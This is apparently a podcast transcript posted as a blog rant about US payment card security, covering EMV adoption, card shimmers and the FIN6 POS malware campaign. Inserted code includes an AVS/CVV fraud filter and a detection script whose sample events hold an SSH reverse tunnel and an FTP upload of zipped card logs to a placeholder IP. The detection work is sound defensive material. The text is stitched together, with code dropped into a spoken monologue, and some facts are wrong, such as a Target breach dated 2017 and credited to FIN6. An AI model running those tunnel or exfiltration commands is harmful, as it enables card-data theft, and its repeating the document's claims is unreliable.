1/19/2019: Payment Card Security

Let’s talk about Payment Card Security.

I am especially going to harp on all those gas stations that have their chip readers duct-taped or marked with Post-it notes written by some retard with a crayon that says “no chip, swipe here…”  More like, “wipe your ass here with our poor security practices.”

So how about some general facts about payment cards to kick this off…

According to the CFPB Consumer Credit Card Market Study, there are approximately 160 million credit card holders in the US, and as of 2017, there were approximately 14.4 billion credit cards in circulation across the globe.  Consumers with an average credit score of 620+ have at least four credit cards.  There are over half a million applications for credit cards per day in the United States.  Crazy.

The frequency of online payments is growing.  According to statistics provided by the US Census Bureau, between 2013 and 2017, online payments in the United States have grown four times as much as retail payments.  Across the globe, the average person makes approximately 19 online transactions using a payment card per calendar year.  We’re talking globally, so I assume this includes nomadic huntsmen and sheep-loving shepherds from arid desert regions too.  I don’t know, they weren’t specific, but I know I made more than 19 transactions over the last year.

2016 represents the first year where incidents of online fraud (58%) surpassed “in-person” fraud.  It’s a trend that will continue.  Consumer confidence is low, and people don’t believe their data is safe when making online purchases.  According to a Pew Research Center Survey, only ~10% of Americans are very confident that the websites they shop at are keeping their credit card information secure.  Surprisingly, another study found that 10% of people are morons.

Here’s where it starts to get interesting.  According to the global news bureau Quartz, America is responsible for approximately one-quarter of the global payment card transaction volume, but accounts for nearly half of all worldwide credit card fraud.  Merchants are explicitly warned to consider the ramifications of fraud on their operations when selling in the United States.  Now, the global payment gateway and payment management company CyberSource indicates that online merchants report the most effective tools to fight payment card fraud to be AVS and CVV filters.  We all know what those are, right?  AVS is address verification (the Address Verification Service checks the billing address the customer enters against what the issuer has on file) and CVV is that little 3-digit number on the back of your card – it’s a card verification value.  The American Express Digital Payments Survey indicates that only 53 percent of merchants require customers to enter their CVV for card validation upon checkout.  In addition, only 39 percent of online merchants actually decline a transaction when the consumer’s billing address has not been provided.
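What leveraging those two filters actually looks like in code, as an added example that is not from any of the surveys or companies cited above: a card-not-present gate that declines when the billing address is missing or the CVV was never collected or mismatched, and only auto-approves on an AVS match.  The AVS and CVV result codes below are assumed (modelled on common processor conventions; every processor publishes its own code table).

```python
"""Card-not-present fraud gate: AVS + CVV filtering (added example).

Result codes are ASSUMED for illustration; real processors publish their own.
"""
from dataclasses import dataclass
from typing import Optional, Tuple

# Assumed AVS result codes (constructed; not any specific processor's table).
AVS_FULL_MATCH = {"Y", "X"}             # street and postal code both match
AVS_PARTIAL = {"A", "Z", "W"}           # only street OR only postal code matched
AVS_NO_MATCH = {"N"}
AVS_UNAVAILABLE = {"U", "R", "S", "G"}  # issuer could not or does not verify

CVV_MATCH = "M"      # assumed code: CVV matched
CVV_NO_MATCH = "N"   # assumed code: CVV did not match


@dataclass
class Checkout:
    billing_address: Optional[str]
    billing_zip: Optional[str]
    cvv_supplied: bool
    avs_result: Optional[str]   # None when no AVS check was requested
    cvv_result: Optional[str]   # None when no CVV check was requested


def fraud_filter(c: Checkout, allow_partial_avs: bool = False) -> Tuple[str, str]:
    """Return (decision, reason); decision is 'approve', 'decline' or 'review'."""
    # Rule 1: no billing address means decline, not a pass-through to the processor.
    if not c.billing_address or not c.billing_zip:
        return "decline", "billing address not provided"
    # Rule 2: CVV must be collected AND checked; an uncollected CVV is a decline.
    if not c.cvv_supplied or c.cvv_result is None:
        return "decline", "cvv not collected"
    if c.cvv_result == CVV_NO_MATCH:
        return "decline", "cvv mismatch"
    # Rule 3: AVS outcome decides between approve, review and decline.
    if c.avs_result in AVS_FULL_MATCH:
        return "approve", "avs full match, cvv match"
    if c.avs_result in AVS_PARTIAL:
        return ("approve" if allow_partial_avs else "review"), "avs partial match"
    if c.avs_result in AVS_NO_MATCH:
        return "decline", "avs no match"
    # Unavailable or unknown AVS result: never auto-approve, send to manual review.
    return "review", "avs unavailable or unknown"
```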

Do we see a pattern emerging here?  Statistically speaking, the theft-level of chip card data in the US is 868% higher than the rest of the world!  “But what gives?  EMV chip cards are supposed to be secure?”

All right, all right.  Back up.  So what is EMV?  EMV stands for Europay, Mastercard, and Visa.  It was later branded EMVCo to represent additional members added to the consortium.  These cards were finally made available to US consumers starting in 2015, give or take.  EMV provides end-to-end encryption of cardholder data, and serves its purpose everywhere but here in the United States.  They are designed to defeat payment card counterfeiting associated with magnetic stripe data.

By now you should be making the connection.  The magnetic stripe readers are the devil.  A study reported in May 2018 from the research firm Gemini Advisory found that financial institutions were successful in providing consumers with EMV-compliant credit and debit cards for use.  They were mailed out pretty quickly, as I recall.  They also found that EMV technology did not eradicate card-present fraud whatsoever.  Of more than 60 million payment cards stolen in the 12 months prior to the study, chip-enabled cards represented 93% of the total.  75% of these were compromised at point-of-sale machines.  The results reflect the lack of US merchant compliance with the EMV implementation.  Again, hey gas stations… no chip… wipe your ass here.

As a side note, you’ve probably seen the news stories about card skimmers, or shimmers, at gas pumps in dark secluded areas, where you insert your card and the bad guys capture your data and you’re screwed.  Technically, the shimmer mechanism is inserted as a man-in-the-middle type of attack between the EMV chip and the ATM or POS chip reader prior to any instance of tokenization.  It reads what’s called track 1 and track 2 data, which is what was traditionally associated with two of the three tracks that make up the magnetic stripe.  The attacker can now clone your data to a magnetic stripe and merrily go to some non-compliant store with a stripe reader to buy beer and cigarettes.  It’s the failure of merchants to be fully EMV-compliant that results in the theft and loss.

So to summarize this so far, we have merchants in card-present settings, like gas stations, who are dragging their feet about banning the magnetic stripe readers, or who don’t implement the full security of EMV.  Or their chip reader breaks and they fall back to a magnetic reader.  Then we have card-not-present transactions, otherwise known as online transactions, where merchants are doing an awfully crummy job of leveraging address and card verification filters in the manner prescribed.  Europe has GDPR – that’s the General Data Protection Regulation law – which they rolled out in early 2018 against the objection of companies who said they could never modernize their processes to the extent necessary.  But most of them did for fear of fines which would bankrupt small and medium-sized companies.  Meanwhile the US has little regulation and we’re becoming a veritable laughingstock to the rest of the civilized world.

The government is doing nothing.  There’s a large political sentiment in the US about avoiding government regulation and I’m not going to open a can of worms with that, but the only ones suffering from this lack of regulation right now are US citizens.  Free markets are doing jack shit – Visa is trying I guess, but really it’s to protect their direct customer base if you think about it.  Prior to 2015, credit card issuers were liable for a large majority of counterfeit chargebacks on card-present transactions, so the consortium got together and established a deadline in October 2015 to implement EMV-compliant POS systems in an effort to move liability for those chargebacks to the merchants or their payment processors.  But of course, there were loopholes and realistically this lacks the force of any meaningful government oversight.  Get this… if a merchant allows a person to swipe their card and it turns out to be fraudulent, as long as they have EMV enabled, they are not liable.

It’s the same mentality that so many companies have about security these days… “hey we need to pass the audit, let’s check the box, pass it, and not give a shit about proper security practices thereafter.”  But I digress.

So long as I’m painting a bleak picture, let’s talk about what else makes absolutely no sense in regard to retail purchases in the US.

  1. You can still pay by check at most retailers.  (Who the hell carries a checkbook with them to the store anymore?)
  2. If you go to a restaurant, you hand the waitress or waiter your payment card and they walk away with it.  And then they proceed to write down your name, card number and CVV number.  There was a restaurant here locally a couple of years ago which ran a massive card theft operation and I doubt the conspirators were ever caught.  I had family members and friends get compromised, and they had friends who got compromised.  Mysterious charges appeared on their card from other states, so they were clearly selling the data for profit.  I’d say the name of the restaurant, but… hold on, let me check with our producers here to see if we can… nevermind, it’s a no.
  3. Here in the US, EMV retailers may require chip + signature.  I have no idea what the benefit to this is, but no one checks the signature on the back of your card.  I mean, even if they did, are they forensic handwriting experts who can really tell the difference?  You have teenagers with fake IDs and mugshots of Big Bird on them buying beer at these gas stations, how the hell are they going to tell the difference in signatures?
  4. Fact: Ex-Soviet Bloc countries in the EU have more advanced payment card protections than the US.  I’m calling that out.  Don’t @ me.
  5. British cyber-security expert Kevin Beaumont, aka “Gossi the Dog,” likens travel to the US to having to “remember how things worked two decades ago” in terms of payment card security.

All right, who’s behind these attacks anyway?  Let’s talk about that for a bit.  I won’t bore everybody with the fine details – you can find links to official reports and the details of this case study on our Podcast website once it’s up and running – but the cybersecurity group FireEye published a report entitled “Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6” in April 2016.  It is a pretty in-depth technical case study into the inner workings of one of the main threat actors who are responsible for a large number of POS system compromises over the last several years.  The report is based on findings gathered through several Mandiant Consulting investigations into the hospitality and retail sectors where FIN6 was successful in compromising POS systems and stealing millions of payment card numbers.

So here’s the rub.  FIN6 normally stumbles onto its targets by way of massive spam campaigns facilitated by the GRABNEW malware and similar variants.  GRABNEW is a credential-stealing backdoor with form-grabbing capabilities and the ability to inject code into specific web pages to mimic a valid login prompt for financial institutions to facilitate banking fraud.  FireEye found that it is often employed by FIN6 in conjunction with POS malware payloads.  FIN6 likely didn’t write the malware, but traded or purchased rights to it through the complex, seedy criminal underworld ecosystem.

After stumbling onto a target, the threat actors typically use components of the Metasploit framework to establish persistence.  A common hallmark was to use a downloader program to connect to command and control servers to download and execute shellcode using either registry run keys or Windows scheduled tasks to establish persistence with the group’s preferred back doors.

After FIN6 establishes persistence, they may use public utilities like Windows Credential Editor for privilege escalation and credential harvesting.  They have also used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the company’s Active Directory database, extract the hashes and crack them offline at their leisure to obtain domain admin.

Aside from this AD information, multiple tools are used to conduct reconnaissance of SQL databases and NetBIOS information.  Once they’ve got you mapped out, they begin lateral movement across the network using PsExec and Remote Command Executor tools to leverage the cracked passwords to gain a better foothold in the environment.  FIN6 would commonly use the Plink command-line utility, which is part of the PuTTY SSH family of utilities, to create SSH tunnels to their C2 servers for routing RDP traffic for their threat actors’ administration, right under the noses of security folks who are too busy spending their work day attending to the company’s lost and found box or fixing physical badge readers that broke on the office supplies closet door.

So through this lateral movement, complete with NetBIOS recon because people still run that crap, the attackers identify the POS systems.  At this stage, FIN6 would routinely deploy the TRINITY or FrameworkPOS malware using scheduled Windows tasks.  The malware runs continuously, and targets system processes not listed in its accompanying process blacklist in an effort to stay one step ahead of defenders.  That’s a key reason why persistent C2 communications are so important.  Anyway, TRINITY scans for payment card data signatures, and copies it to a local file in a subdirectory within the C:\Windows directory.

Exfiltration from the targeted environment occurs via a script used by FIN6 to iterate a list of compromised POS systems and copy harvested track data files to a numbered log file before erasing the original data files for obfuscation.  The log files are compressed into a .zip archive and moved to staging systems which are set up to send the stolen data to C2 servers using an FTP command-line utility (which is presumably encrypted).  As a final note, FIN6 has also previously used methods to upload data to file sharing services rather than C2 servers.  How do you like them apples?
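Turning the chain just described into detection logic, as an added example that is not from the FireEye report or any FIN6 tooling: a Python pass over constructed Windows event records (scheduled task creation as Event ID 4698, process creation as 4688) that flags scheduled tasks launched from writable paths under the Windows directory, Plink tunnels carrying RDP, and archive-then-FTP staging on the same host.  The Event IDs are the standard Windows Security log values; hostnames, paths, IPs and command lines are constructed.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample events (not real telemetry). Event ID 4698 = scheduled task
# created, 4688 = process created. Hostnames, paths and IPs are placeholders.
SAMPLE_EVENTS = [
    {"id": 4698, "host": "POS-07", "command": r"C:\Windows\Temp\upd\svc.exe"},
    {"id": 4688, "host": "POS-07", "command": r"plink.exe -N -R 3389:127.0.0.1:3389 u@203.0.113.10"},
    {"id": 4688, "host": "STAGE-01", "command": r"7z.exe a C:\Windows\Tmp\1.zip C:\Windows\Tmp\*.log"},
    {"id": 4688, "host": "STAGE-01", "command": r"ftp.exe -s:C:\Windows\Tmp\up.txt 203.0.113.10"},
    {"id": 4688, "host": "WS-12", "command": r"C:\Program Files\PuTTY\plink.exe -ssh jump.internal"},
    {"id": 4698, "host": "WS-12", "command": r"C:\Program Files\Vendor\backup.exe"},
]

# Task action launched from a writable subdirectory of the Windows directory.
WRITABLE_WIN_PATH = re.compile(r"^C:\\Windows\\(Temp|Tmp|Tasks)\\", re.I)
# plink port forwarding (-R remote or -L local) that carries RDP on 3389.
RDP_TUNNEL = re.compile(r"\bplink(\.exe)?\b.*\s-[RL]\s*\S*\b3389\b", re.I)
# Archiver touching files under the Windows directory, and an FTP client.
ARCHIVER = re.compile(r"\b(7z|rar|zip)(\.exe)?\b.*C:\\Windows\\", re.I)
FTP_CLIENT = re.compile(r"\bftp(\.exe)?\b", re.I)


def detect(events) -> List[Tuple[str, str]]:
    """Return (host, finding) pairs in event order. An archiver run followed by an
    FTP client on the same host is reported as one combined staging finding."""
    findings: List[Tuple[str, str]] = []
    per_host: Dict[str, Set[str]] = {}
    for ev in events:
        host, cmd = ev["host"], ev["command"]
        flags = per_host.setdefault(host, set())
        if ev["id"] == 4698 and WRITABLE_WIN_PATH.search(cmd):
            findings.append((host, "scheduled-task persistence from writable path"))
        elif ev["id"] == 4688:
            if RDP_TUNNEL.search(cmd):
                findings.append((host, "RDP forwarded over SSH tunnel"))
            if ARCHIVER.search(cmd):
                flags.add("archive")
            if FTP_CLIENT.search(cmd) and "archive" in flags:
                findings.append((host, "archive under C:\\Windows followed by FTP client"))
    return findings


if __name__ == "__main__":
    for host, finding in detect(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```

The legitimate PuTTY session and vendor backup task on WS-12 produce no findings, which is the point: the rules key on the tunnel and staging pattern, not on the presence of the tools.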

At this point, you’re screwed because you went to Kwik Trip and paid for your yogurt parfait, 24-hour energy boost, and cigarettes with the damned magnetic stripe.  Your track data is now being dumped along with hundreds of thousands or even millions of other oblivious cardholders’ records into dark web card shops for retail purchase by an unscrupulous but enterprising meth addict with high-speed internet access and a TOR browser in northwestern Mississippi.  Probably.

The reality is, companies who are not EMV-compliant are the biggest targets.  The attack methods previously described are not changing drastically.  As more merchants slowly warm up to chip readers, researchers note that threat actors are just becoming more focused on places like gas stations, which do not have a mandate to move to them until 2020.  Why the EMV consortium gave gas stations so long to wait without risk of repercussion makes no sense to me, but don’t expect Kwik Trip to look out for your payment card security for another year and a half or more.

And if you don’t think it’s rampant, rewind the podcast and check those preliminary statistics again.  The Home Depot breach in 2014 affected POS systems which compromised some 56 million credit and debit card numbers.  This was actually larger than the 2017 Target breach, which compromised 40 million payment cards.  That ironically was a FIN6 special, and the company had just implemented new FireEye security mechanisms, but no one knew how to use them properly.  Wow, if that doesn’t sound familiar to so many IT folks.

To close, in the immortal words of Andy Rooney, “If dogs could talk it would take a lot of the fun out of owning one.”